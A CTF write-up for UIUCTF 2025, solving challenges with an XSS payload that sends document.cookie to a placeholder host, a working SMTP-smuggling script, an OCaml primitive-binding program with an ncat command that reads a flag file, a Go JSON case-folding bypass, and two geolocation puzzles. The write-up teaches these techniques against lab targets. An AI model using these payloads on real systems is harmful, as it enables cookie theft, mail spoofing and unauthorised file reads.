UIUCTF 2025 writeup
Preface
I had other things to do on the second day, so I didn't write up much.
Ruler of the Universe
```js
${String(value).replace('"', "&quot;")}
```
`String.prototype.replace` with a string pattern rewrites only the first match, so only the first `"` in the value is escaped; every later `"` is emitted verbatim. Two `"` characters are therefore enough to break out: the first is consumed by the escaper, the second closes the attribute.
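An added illustration, my code rather than the challenge's or the writeup's: it reproduces the first-match-only escaper in Python with `str.replace(..., 1)` next to a full `html.escape`, renders a payload in the form of the writeup's (here ending in `x="` so the template's own closing quote is absorbed) into an assumed `<input value="...">` template, and runs `html.parser` over the result to show which attributes a parser actually assigns. The template, `PAYLOAD` and all names are mine.

```python
import html
from html.parser import HTMLParser

# Hypothetical template standing in for the challenge's: the value lands inside
# a double-quoted attribute.
TEMPLATE = '<input type="text" value="{}">'

# Constructed payload in the form of the writeup's: the first quote is eaten by
# the escaper, the second closes value="...", the rest adds attributes, and the
# trailing x=" absorbs the template's own closing quote.
PAYLOAD = '"" autofocus onfocus="fetch(\'https://xx/?\' + document.cookie)" x="'


def escape_first_quote_only(value) -> str:
    """Emulates the challenge's escaper: JS String.prototype.replace with a
    string pattern rewrites only the first match, which str.replace(..., 1)
    reproduces in Python."""
    return str(value).replace('"', "&quot;", 1)


def escape_all(value) -> str:
    """Hardened escaper: html.escape rewrites every &, <, >, " and '."""
    return html.escape(str(value), quote=True)


def render(escaper, value) -> str:
    """Interpolates the escaped value into the attribute."""
    return TEMPLATE.format(escaper(value))


class _InputAttrs(HTMLParser):
    """Collects the attributes an HTML parser assigns to the <input> tag."""

    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs = dict(attrs)


def parsed_attributes(rendered: str) -> dict:
    """Returns the <input> attributes as a parser sees them (entities decoded)."""
    parser = _InputAttrs()
    parser.feed(rendered)
    parser.close()
    return parser.attrs


if __name__ == "__main__":
    for escaper in (escape_first_quote_only, escape_all):
        markup = render(escaper, PAYLOAD)
        print(escaper.__name__)
        print("  markup:", markup)
        print("  attrs: ", parsed_attributes(markup))
```

With the first-match-only escaper the parser assigns `autofocus` and `onfocus` as real attributes of the input; with `html.escape` the whole payload stays inside `value`, which is the check to make when reviewing a hand-rolled escaper.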
```html
"" autofocus onfocus="fetch('https://xx/?' + document.cookie)">
```
park
Look up the green building in the background: it is Timmermansordens hus. Google Maps then identifies the park as Tegnérlunden.
cherry_blossom
A normal image search just returns cherry blossoms, but on closer inspection the blossoms are fake.
Cropping out the building structure and searching for that finds the Brussels Autoworld museum 2025 pass --- Entrada general al museo Autoworld de Bruselas 2025.
The museum on that site has exactly the same building structure; the cherry blossoms were props for an exhibition.
The exact location is Parc du Cinquantenaire 11, 1000 Bruxelles, Belgium.
Supermassive Black Hole
```python
smtplib._fix_eols = return_unchanged
smtplib._quote_periods = return_unchanged
```
The challenge patches these two smtplib helpers to the identity, so the message reaches the server without any automatic rewriting. Normally `_fix_eols` turns a bare `\n` into `\r\n` and `_quote_periods` doubles a leading `.`, precisely so that a line inside the body can never look like the end-of-DATA marker; without them the mail can be terminated early.
The end-of-DATA marker is `\r\n.\r\n`, and the code checks for it:
```python
ending_count = message_data.count(b'\r\n.\r\n')
if ending_count != 1:
    raise ValueError("Bad Request")
```
But the check only counts that exact byte sequence. A terminator written as `\n.\r\n` (bare LF before the dot) is not counted, yet it still ends the mail at the `.` line.
After that, build the new mail. The format is roughly:
```
MAIL FROM: [email protected]\r\n
RCPT TO: test\r\n
DATA\r\n
From: [email protected]\r\n
Subject: test\r\n
X-Ticket-ID: leader\r\n
```
The new mail's ID is then `leader`, so query with `leader`.
Putting the payload together:
```python
import requests
import time

BASE_URL = "https://inst-1bb31567b335735e-supermassive-black-hole.chal.uiuc.tf"


def submit_ticket():
    # The subject carries the early terminator (bare LF before the dot, so the
    # server-side count of b'\r\n.\r\n' stays at 1), followed by a second
    # envelope and DATA block whose X-Ticket-ID is "leader".
    subject = (
        "\n.\r\n"
        "MAIL FROM: [email protected]\r\n"
        "RCPT TO: test\r\n"
        "DATA\r\n"
        "From: [email protected]\r\n"
        "Subject: test\r\n"
        "X-Ticket-ID: leader\r\n"
    )
    data = {
        "subject": subject,
        "message": "testmessage",
    }
    response = requests.post(f"{BASE_URL}/submit_ticket", data=data)
    print(response.text)


def check_response(ticket_id):
    try:
        response = requests.get(f"{BASE_URL}/check_response/{ticket_id}", timeout=10)
        return response.json()
    except (requests.RequestException, ValueError):
        return None


def main():
    submit_ticket()
    time.sleep(5)  # give the mail bot time to process the injected ticket
    print(check_response("leader"))


if __name__ == "__main__":
    main()
```
```
Error: (250, b'OK')
{'body': 'X-Ticket-ID: 3794d4cd-71e9-4a19-bcac-62f3b190affd\r\n\r\ntestmessage\r\n', 'from': '[email protected]', 'processed_by': 'it_bot', 'response': 'C-Suite ticket received! Will escalate immediately!\nuiuctf{7h15_c0uld_h4v3_b33n_4_5l4ck_m355463_8091732490}', 'subject': 'test', 'timestamp': 1753517824464}
```
The submit request itself reports an error, but the injected mail was already accepted as ticket `leader`, and its response carries the flag. The real ticket's `X-Ticket-ID` header ended up in the body of the injected mail, which is why it shows up there.
nocaml
Only OCaml's built-in low-level C primitives are used, which need no extra linking:
```ocaml
(* Bind the runtime's C primitives directly: these are the same externals
   Stdlib's I/O functions are built on, so nothing extra has to be linked. *)
external sys_open : string -> 'a list -> int -> int = "caml_sys_open"
external open_descriptor_in : int -> in_channel = "caml_ml_open_descriptor_in"
external open_descriptor_out : int -> out_channel = "caml_ml_open_descriptor_out"
external ml_input : in_channel -> bytes -> int -> int -> int = "caml_ml_input"
external ml_output : out_channel -> bytes -> int -> int -> unit = "caml_ml_output"
external create_bytes : int -> bytes = "caml_create_bytes"

let () =
  let in_fd = sys_open "/pwn/flag.txt" [] 0 in   (* empty flag list = read-only *)
  let ic = open_descriptor_in in_fd in
  let buf = create_bytes 100 in
  let bytes_read = ml_input ic buf 0 100 in
  let oc = open_descriptor_out 1 in                (* fd 1 = stdout *)
  let () = ml_output oc buf 0 bytes_read in
  ()
```
The same program as a one-liner, base64-encoded and sent to the service:
```sh
(echo 'external sys_open : string -> '\''a list -> int -> int = "caml_sys_open";; external open_descriptor_in : int -> in_channel = "caml_ml_open_descriptor_in";; external open_descriptor_out : int -> out_channel = "caml_ml_open_descriptor_out";; external ml_input : in_channel -> bytes -> int -> int -> int = "caml_ml_input";; external ml_output : out_channel -> bytes -> int -> int -> unit = "caml_ml_output";; external create_bytes : int -> bytes = "caml_create_bytes";; let () = let in_fd = sys_open "/pwn/flag.txt" [] 0 in let ic = open_descriptor_in in_fd in let buf = create_bytes 100 in let bytes_read = ml_input ic buf 0 100 in let oc = open_descriptor_out 1 in let () = ml_output oc buf 0 bytes_read in ();;' | base64 -w0; echo) | ncat --no-shutdown --ssl nocaml.chal.uiuc.tf 1337
```
Shipping Bay
By the time I had this one solved, someone else had already submitted it.
So here is just a reference:
Unexpected security footguns in Go's parsers - The Trail of Bits Blog
The issue is a parser differential: Go's `encoding/json` matches keys to struct fields case-insensitively using Unicode case folding, so `ſ` (U+017F, long s) is treated as `s`, and when more than one key matches the same field the last one wins.
So sending `supply_type=others&ſupply_type=flag` is enough to get the flag.
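An added Python model of the differential, not code from the challenge or from the Trail of Bits post: `parse_qs` stands in for a parser that compares keys byte for byte, and `go_json_style_decode` imitates `encoding/json`'s struct-field matching (case folding via `str.casefold()`, which agrees with Go's `EqualFold` for U+017F, and last matching key wins). The request body, the assumption that `supply_type` is the struct field's name, and the strict variant are mine.

```python
from urllib.parse import parse_qs, parse_qsl

# Constructed request body: the second key starts with U+017F (LATIN SMALL
# LETTER LONG S, UTF-8 C5 BF), i.e. the writeup's "ſupply_type".
BODY = "supply_type=others&%C5%BFupply_type=flag"
FIELDS = ["supply_type"]   # assumed struct field the Go side decodes into


def frontend_view(body: str) -> dict:
    """A parser that compares keys byte for byte (parse_qs here) keeps the two
    keys apart, so a check such as supply_type != "flag" sees "others"."""
    return {key: values[-1] for key, values in parse_qs(body).items()}


def go_json_style_decode(body: str, fields) -> dict:
    """Model of encoding/json's field matching, not Go code: a key matches a
    field when the two are equal exactly or under Unicode case folding
    (str.casefold() maps U+017F to "s", as Go's EqualFold does), and a later
    matching key overwrites an earlier one."""
    decoded = {}
    for key, value in parse_qsl(body):          # parse_qsl preserves order
        for field in fields:
            if key == field or key.casefold() == field.casefold():
                decoded[field] = value
    return decoded


def strict_decode(body: str, fields):
    """Hardened variant: accept only exact key names and reject a body in which
    a field is set more than once. Returns None when the body is rejected."""
    decoded = {}
    for key, value in parse_qsl(body):
        if key not in fields or key in decoded:
            return None
        decoded[key] = value
    return decoded


if __name__ == "__main__":
    print("front end sees :", frontend_view(BODY))
    print("Go-style decode:", go_json_style_decode(BODY, FIELDS))
    print("strict decode  :", strict_decode(BODY, FIELDS))
```

The front-end view reads `others` for `supply_type`, while the fold-matching, last-wins decoder ends up with `flag` for the same field. The strict variant refuses the body outright, which is the behaviour to want wherever a value is checked by one parser and consumed by another.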
License:
CC BY 4.0